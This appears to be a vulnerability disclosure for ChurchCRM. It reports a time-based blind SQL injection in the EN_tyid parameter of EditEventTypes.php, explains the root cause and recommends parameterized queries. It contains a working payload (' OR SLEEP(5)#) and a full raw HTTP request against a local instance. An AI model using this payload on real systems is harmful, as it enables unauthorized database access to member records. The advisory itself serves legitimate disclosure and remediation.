Description
The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.
This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.
Proof of Concept
Triggering response delays with MySQL sleep function through Time-based SQL Injection.
Affected Parameter: EN_tyid
Payload: ' OR SLEEP(5)#
POST /churchcrm/EditEventTypes.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/churchcrm/EditEventTypes.php
Cookie: CRM-2c90cf299230a50dab55aee824ed9b08=10amb7tfpmsvp76h7kcqtggqf3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
EN_tyid=1'+OR+SLEEP(5)%23&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=10%3A30%3A00&newCountName=
Root Cause
User input on the Event parameter is not sanitized and used directly in the query through string concatenation. https://github.com/ChurchCRM/CRM/blob/master/src/EditEventTypes.php#L33,L71
Recommendation
Avoid direct string concatenation into the sql query. It's recommended to use input sanitization as well as implementing parameterized query.